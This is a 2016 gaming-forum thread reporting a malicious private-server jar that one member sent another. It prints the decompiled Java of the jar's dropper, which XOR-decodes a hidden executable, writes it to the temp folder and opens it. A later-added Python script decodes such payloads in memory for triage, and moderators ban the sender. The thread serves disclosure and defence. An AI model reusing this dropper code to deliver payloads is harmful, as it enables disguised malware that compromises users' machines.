progamerz Posted April 15, 2016

Disputed member: http://osbot.org/forum/user/62294-berke203/

Thread Link: N/A

Explanation: He sent me an RSPS server link on Skype, I ran it, and ESET caught it as a virus, so after that I decompiled it.

Evidence:

Skype Profile screenshot with chat background: http://i.imgur.com/RlmLEn3.png

Skype Chat logs:
1) http://i.imgur.com/lF8nu7l.png
2) http://i.imgur.com/hkWFOVa.png
3) http://i.imgur.com/jX8uqKL.png
4) http://i.imgur.com/mr07vog.png
5) http://i.imgur.com/LjECo9U.png
6) http://i.imgur.com/LjECo9U.png
7) http://i.imgur.com/OmxNc6Z.png
8) http://i.imgur.com/x8TjRNJ.png
9) http://i.imgur.com/5ZR8ZVA.png
10) http://i.imgur.com/DyXYY9w.png
11) http://i.imgur.com/DFTEunv.png

File Code:

Main.java

```java
/*
 * Decompiled with CFR 0_114.
 */
package de.sogomn.drop;

import de.sogomn.drop.FileDropper;
import de.sogomn.drop.XorCipher;
import java.io.BufferedReader;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.Reader;
import java.util.ArrayList;
import java.util.function.IntFunction;
import java.util.stream.Stream;

public final class Main {
    private static final String NAME_PATH = "/data";
    private static final String TEMP_DIRECTORY = System.getProperty("java.io.tmpdir");

    private Main() {
    }

    private static String[] readLines(String path) throws IOException {
        InputStream in = Main.class.getResourceAsStream(path);
        InputStreamReader inReader = new InputStreamReader(in);
        BufferedReader reader = new BufferedReader(inReader);
        ArrayList<String> lines = new ArrayList<String>();
        String line = null;
        while ((line = reader.readLine()) != null) {
            lines.add(line);
        }
        reader.close();
        String[] lineArray = (String[])lines.stream().toArray(n -> new String[n]);
        return lineArray;
    }

    private static byte[] readResource(String fileName) throws IOException {
        InputStream in = Main.class.getResourceAsStream("/" + fileName);
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        byte[] buffer = new byte[1024];
        int bytesRead = 0;
        while ((bytesRead = in.read(buffer)) != -1) {
            out.write(buffer, 0, bytesRead);
        }
        in.close();
        byte[] data = out.toByteArray();
        return data;
    }

    public static void main(String[] args) {
        try {
            String[] fileNames;
            String[] arrstring = fileNames = Main.readLines("/data");
            int n = arrstring.length;
            int n2 = 0;
            while (n2 < n) {
                String name = arrstring[n2];
                byte[] data = Main.readResource(name);
                XorCipher.crypt(data);
                FileDropper dropper = new FileDropper(name, data);
                dropper.drop(TEMP_DIRECTORY);
                ++n2;
            }
        }
        catch (IOException ex) {
            ex.printStackTrace();
        }
    }
}
```

XorCipher.java

```java
/*
 * Decompiled with CFR 0_114.
 */
package de.sogomn.drop;

public final class XorCipher {
    private static final byte KEY = 56;

    private XorCipher() {
    }

    public static void crypt(byte[] data) {
        int i = 0;
        while (i < data.length) {
            data[i] = (byte)(data[i] ^ 56);
            ++i;
        }
    }
}
```

FileDropper.java

```java
/*
 * Decompiled with CFR 0_114.
 */
package de.sogomn.drop;

import java.awt.Desktop;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;

public final class FileDropper {
    private String fileName;
    private byte[] data;

    public FileDropper(String fileName, byte[] data) {
        this.fileName = fileName;
        this.data = data;
    }

    private void execute(File file) throws IOException {
        boolean openSupported;
        Desktop desktop;
        boolean desktopSupported = Desktop.isDesktopSupported();
        if (desktopSupported && (openSupported = (desktop = Desktop.getDesktop()).isSupported(Desktop.Action.OPEN))) {
            desktop.open(file);
        }
    }

    public void drop(String directory) throws IOException {
        File file = new File(String.valueOf(directory) + File.separator + this.fileName);
        FileOutputStream out = new FileOutputStream(file);
        out.write(this.data);
        out.flush();
        out.close();
        this.execute(file);
    }
}
```

If u need anything more lemme know.

Thanks,
Progamerz

progamerz Posted April 15, 2016

Anything extra needed?

Khaleesi Posted April 15, 2016 (edited)

Decompiled as well.

The Jar holds a "RSPS jar", "data" folder and a "Crypted.exe" file. In the code above you can see he accesses the /data folder and crypts the CRYPTED.exe file.

Probs holds a RAT or some other malicious code, but can't prove that ^^

Be careful if you open this!

Khaleesi

Edited April 15, 2016 by Khaleesi

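For analysts who want to inspect such a jar without running it, here is an added example (not code from this thread or from the jar's author) that repeats the dropper's steps statically: it reads the `data` resource as a list of file names, as `Main.readLines` does, and reverses the XOR with the key 56 from `XorCipher` in memory, reporting size, SHA-256 and whether the result starts with a PE header. The function names and the sample jar are constructed for illustration; nothing is written to disk or opened.

```python
import hashlib
import io
import zipfile

XOR_KEY = 56  # KEY constant from the decompiled XorCipher class


def xor_decode(data: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR, the same operation as XorCipher.crypt."""
    return bytes(b ^ key for b in data)


def triage_dropper_jar(jar_bytes: bytes, manifest: str = "data") -> list:
    """Decode each resource named in the manifest in memory; never write or run it."""
    report = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = jar.read(manifest).decode("utf-8", "replace").splitlines()
        for name in (n.strip() for n in names):
            if not name:
                continue
            try:
                raw = jar.read(name)
            except KeyError:
                report.append({"name": name, "error": "listed but missing"})
                continue
            decoded = xor_decode(raw)
            report.append({
                "name": name,
                "size": len(decoded),
                "sha256": hashlib.sha256(decoded).hexdigest(),
                "pe_header": decoded[:2] == b"MZ",   # executable after decoding
                "stored_as_pe": raw[:2] == b"MZ",    # False means hidden from naive scans
            })
    return report


def build_sample_jar() -> bytes:
    """Constructed sample: a harmless stub stored XOR-encoded, plus a dangling name."""
    stub = b"MZ" + b"\x00" * 62  # only the magic bytes, not a real executable
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("data", "Crypted.exe\nmissing.bin\n")
        jar.writestr("Crypted.exe", xor_decode(stub))
    return buf.getvalue()


if __name__ == "__main__":
    for entry in triage_dropper_jar(build_sample_jar()):
        print(entry)
```
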
progamerz Posted April 15, 2016

> Decompiled as well.
>
> The Jar holds a "RSPS jar", "data" folder and a "Crypted.exe" file. In the code above you can see he accesses the /data folder and decrypts the CRYPTED.exe file.
>
> Probs holds a RAT or some other malicious code.
>
> Khaleesi

Thanks!

Developer Maxi Posted April 15, 2016

Malicious code for sure. Action will be taken, thanks for your efforts.

Dex Posted April 15, 2016

Can you report the PM he sent you please?

iKill Posted April 15, 2016

This guy has added me on Skype, should I remove him/her?

Dex Posted April 15, 2016

> This guy has added me on Skype, should I remove him/her?

Yes, please do so.

Genii Posted April 15, 2016

> This guy has added me on Skype, should I remove him/her?

Can you provide evidence that the Skype links to berke203?

progamerz Posted April 15, 2016

> Can you report the PM he sent you please?

Sure thought u can check pm logs

Says he is banned

progamerz Posted April 15, 2016

http://i.imgur.com/rSUjf6W.png

iKill Posted April 15, 2016

I've blocked and removed on Dex's request, but he had a link, linking to an RSPS advert page (idk if I should say the name of the forum, therefore I won't, but I'm sure you know which one it is)

Dex Posted April 16, 2016

> I've blocked and removed on Dex's request, but he had a link, linking to an RSPS advert page (idk if I should say the name of the forum, therefore I won't, but I'm sure you know which one it is)

Thanks for providing this info, the user was already IP banned out of precautionary measures and will remain IP banned now.